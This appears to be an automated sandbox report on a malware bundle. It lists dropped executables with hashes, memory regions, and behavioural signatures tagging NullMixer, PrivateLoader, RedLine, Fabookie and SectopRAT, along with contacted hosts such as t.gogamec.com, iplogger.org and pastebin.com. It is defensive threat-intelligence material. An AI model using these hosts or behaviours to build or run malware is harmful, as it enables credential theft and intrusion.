memory/2704-80-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2704-79-0x000000006494A000-0x000000006494F000-memory.dmp

memory/2704-73-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2704-69-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2704-78-0x000000006FE40000-0x000000006FFC6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19ac3c92c21.exe

MD5 962b4643e91a2bf03ceeabcdc3d32fff
SHA1 994eac3e4f3da82f19c3373fdc9b0d6697a4375d
SHA256 d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b
SHA512 ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19f40f8518b9946.exe

MD5 a4bf9671a96119f7081621c2f2e8807d
SHA1 47f50ae20bfa8b277f8c8c1963613d3f4c364b94
SHA256 d9e5cf75da07717a818853d2f1aa79d3d1aaa155bb06fffed3c92ccaf972aef7
SHA512 f0af42f99f09b5c118ebd275d0b905b91d93893034c98b84c370e7243e1b55502585808cfa33a1779d478f6e308eb32f1896d57a5f6fab0edc4362def08a5b0a

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19cd42a7c874e44.exe

MD5 0c4602580c43df3321e55647c7c7dfdb
SHA1 5e4c40d78db55305ac5a30f0e36a2e84f3849cd1
SHA256 fa02543c043d0ca718baf3dfafb7f5d0c018d46ee6e0f0220095e5874f160752
SHA512 02042264bc14c72c1e8e785812b81dad218e2ecf357db5497e80eabc739c4ad7d9176b6a9e061b909dac1ea188a7ca9e3b1c610c97d52e020ccd947f286dbe11

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19cef5687a.exe

MD5 c1bc0cca3a8784bbc7d5d3e9e47e6ba4
SHA1 500970243e0e1dd57e2aad4f372da395d639b4a3
SHA256 5d1b978e6d2896796f0f63043ecaa1748c1c7245ccda02115afc5594e3f5e3b1
SHA512 929893f5359493bdcf2d2ba9d08a7fe808219c6a93f7f1433d915c520f84a9b03bd2c642722321b9875c1227672ce0773f76220bbde50aadc71754d82ffadbd5

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue197e9ec0ff0.exe

MD5 b4c503088928eef0e973a269f66a0dd2
SHA1 eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA256 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
SHA512 c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue196397c0f84f8.exe

MD5 7c20266d1026a771cc3748fe31262057
SHA1 fc83150d1f81bfb2ff3c3d004ca864d53004fd27
SHA256 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46
SHA512 e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19c28f648204dbd4.exe

MD5 91e3bed725a8399d72b182e5e8132524
SHA1 0f69cbbd268bae2a7aa2376dfce67afc5280f844
SHA256 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d
SHA512 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe

MD5 bf2f6094ceaa5016d7fb5e9e95059b6b
SHA1 25583e0b5a4e331a0ca97b01c5f4ecf6b2388bad
SHA256 47f383df5f55f756468fbb141377bed62056d72d933d675b3c3267d7be4b7f12
SHA512 11d54869e1690824e74e33ee2e9975d28b77730588dde0eee540eefabdedf46576395301aeb607de2cf009b721172209d66a273ca5e3144061c1bdbe41e03f78

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue1932df4dae.exe

MD5 c90e5a77dd1e7e03d51988bdb057bd9f
SHA1 498bd4b07d9e11133943e63c2cf06e28d9e99fc5
SHA256 cca0d3fb3f19615d643d47b3284fe26ffe359c0d2602e5f1877193c1227bfb54
SHA512 bbdfb7452df93c9425eaea10658e662725ee0de1a30993220231c3e8385f09baeabf78484b41e5780602b51e05f28d767d35e5960c18a246d9b1072783cbad34

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193e530416b51740a.exe

MD5 a2326dff5589a00ed3fd40bc1bd0f037
SHA1 66c3727fb030f5e1d931de28374cf20e4693bbf4
SHA256 550d66af5c386718a10f69652645f21357d305b3e9477c55516201570f9ea28c
SHA512 fd56a630dc37a5322b68502e66fbe2ff54ae94ca61bf0f8e116db002d4038f85722816a5e8ec0f6c0343d250c93a7909185564166591a44d0402aa0c5928e826

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19c9e031f4.exe

MD5 0b67130e7f04d08c78cb659f54b20432
SHA1 669426ae83c4a8eacf207c7825168aca30a37ca2
SHA256 bca8618b405d504bbfe9077e3ca0f9fdb01f5b4e0e0a12409031817a522c50ac
SHA512 8f5495b850b99f92f18113d9759469768d3e16b4afa8ccdee5504886bced6a9ac75184f7c48f627ead16ce67834f5a641d6cea2cb5420e35c26e612572b12c79

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19b4b38a7569a9.exe

MD5 26278caf1df5ef5ea045185380a1d7c9
SHA1 df16e31d1dd45dc4440ec7052de2fc026071286c
SHA256 d626180356047eff85c36abbc7a1752c4f962d79070ffc7803b8db2af3be9be5
SHA512 007f092dfef8895e9b4cd3605544df9cd57e701d154ce89f950f8642462b535725edf89b58c0a240bc080a45c9b5229633fe8b2c20e90c7db65bc1e87bc44e03

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19d1fc7d2654d7a.exe

MD5 363f9dd72b0edd7f0188224fb3aee0e2
SHA1 2ee4327240df78e318937bc967799fb3b846602e
SHA256 e730ae821668acc373e3126bdba84b6d2b74bfdc183a23bcea5cfc94a4802167
SHA512 72681c776ba5f10e7a9c9e40f419dc79772a1370fd92cfe7f87d48a4baceb1aa381ab3a7b9b6f87780e5ee02fda108158497c13c611d2ece914241920c96aece

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue192c34b1c2f5.exe

MD5 8b6f3a6e8d9797093a78f0b85da4a1fc
SHA1 2f8346a3ec3427c5a7681d166501f8f42f620b3b
SHA256 5f465c9a74f35fef4a66cbf336dc90bed8bc8caf7b51a98cb52406942c05a0e8
SHA512 c0ad94faa01f5f3fd67a90df327bd0862243c1f335ccf2582f92867f3c751dfdaf73b7e2d86bd494ca1cc8ba199db7964d61493cd37855a35acbfe0256d2f7ef

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue1968b7ee9058232e8.exe

MD5 21a61f35d0a76d0c710ba355f3054c34
SHA1 910c52f268dbbb80937c44f8471e39a461ebe1fe
SHA256 d9c606fa8e99ee0c5e55293a993fb6a69e585a32361d073907a8f8e216d278dd
SHA512 3f33f07aee83e8d1538e5e3d1b723876ddbecc2a730b8eaf7846522f78f5fc6b65ed23085c3a51e62c91dc80b73c171d8f32c44b92cf144689a834e33ea01b3e

memory/2416-129-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2496-172-0x0000000000F90000-0x0000000001000000-memory.dmp

memory/1732-171-0x00000000000F0000-0x0000000000108000-memory.dmp

memory/1404-170-0x0000000001040000-0x00000000010B2000-memory.dmp

memory/612-169-0x00000000001B0000-0x0000000000220000-memory.dmp

memory/3004-161-0x0000000001100000-0x0000000001108000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QHCI5ZEFY7UWVY6YVHV6.temp

MD5 00e1d8a2561474249aa2e4c9f3a32715
SHA1 a36897c95f9eeba324e6b9b40eb4c7ab56dcac4b
SHA256 b98d635c0058a69854824001b6dbedfb3e13923b4e5afb5ef670967393cfc3f3
SHA512 0edcbaba2058e1a9c545a6b7eaf880f92f40ab9134ea938a6f1a60fad001ccfd582e36d381dff55b863c7f38aacf49e5113d6763b10622965ccdaebd9122d641

memory/1408-193-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2416-192-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1724-191-0x0000000000400000-0x00000000004BD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-DM892.tmp\Tue196397c0f84f8.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

memory/1732-199-0x0000000000430000-0x0000000000436000-memory.dmp

memory/2704-75-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2704-77-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2704-76-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2704-74-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2704-72-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2704-71-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/2380-202-0x0000000000400000-0x0000000002F02000-memory.dmp

memory/2704-217-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2704-221-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2704-220-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2704-219-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2704-218-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2704-215-0x0000000000400000-0x000000000051C000-memory.dmp

memory/560-225-0x00000000023A0000-0x0000000002590000-memory.dmp

memory/1280-226-0x0000000000400000-0x00000000016FB000-memory.dmp

memory/2600-227-0x0000000000400000-0x0000000002F22000-memory.dmp

memory/2436-247-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2948-265-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2436-268-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2948-267-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2436-263-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2948-262-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2948-261-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2436-260-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2436-259-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2948-257-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2948-255-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2948-253-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2436-249-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2436-245-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2436-243-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2704-275-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2704-278-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2704-277-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2704-276-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2704-273-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2704-269-0x0000000000400000-0x000000000051C000-memory.dmp

memory/2560-280-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/1408-279-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2560-284-0x0000000002DA0000-0x0000000002EFC000-memory.dmp

memory/2560-283-0x0000000002AD0000-0x0000000002C2C000-memory.dmp

memory/2844-292-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2844-300-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2844-290-0x0000000000400000-0x0000000000422000-memory.dmp

Analysis: behavioral30

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:28

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

158s

Command Line

"C:\Users\Admin\AppData\Local\Temp\7dc7ca24149bd2f34bc1bf8942cb3ed8730482e4e90a16b5333092ddb80bd084.exe"

Signatures

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7dc7ca24149bd2f34bc1bf8942cb3ed8730482e4e90a16b5333092ddb80bd084.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\7dc7ca24149bd2f34bc1bf8942cb3ed8730482e4e90a16b5333092ddb80bd084.exe

"C:\Users\Admin\AppData\Local\Temp\7dc7ca24149bd2f34bc1bf8942cb3ed8730482e4e90a16b5333092ddb80bd084.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:27

Platform

win10v2004-20241007-en

Max time kernel

79s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-EOSVR.tmp\Wed09f69eef9c0d5b.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed090db89ca4c58.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09ed6b36e57df5f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0900caa0501dc98f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed090db89ca4c58.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09d761ab4704dd931.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0983917533e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09c4c0c3d01.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0944361c3621a67a6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09755e77ed017e8af.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09fbe3bf81.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed091bab77a3bb62d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09f69eef9c0d5b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0968d19e5ec37794.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-EOSVR.tmp\Wed09f69eef9c0d5b.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09f69eef9c0d5b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3HVL9.tmp\Wed09f69eef9c0d5b.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09755e77ed017e8af.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09fbe3bf81.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0968d19e5ec37794.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE N/A

Reads user/profile data of web browsers

spyware stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0900caa0501dc98f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed091bab77a3bb62d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09fbe3bf81.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-3HVL9.tmp\Wed09f69eef9c0d5b.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0983917533e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09755e77ed017e8af.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-EOSVR.tmp\Wed09f69eef9c0d5b.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09ed6b36e57df5f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed090db89ca4c58.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09fbe3bf81.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09c4c0c3d01.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0968d19e5ec37794.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09f69eef9c0d5b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0968d19e5ec37794.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09755e77ed017e8af.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09f69eef9c0d5b.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0983917533e.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0983917533e.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0983917533e.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09d761ab4704dd931.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09c4c0c3d01.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4124 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe
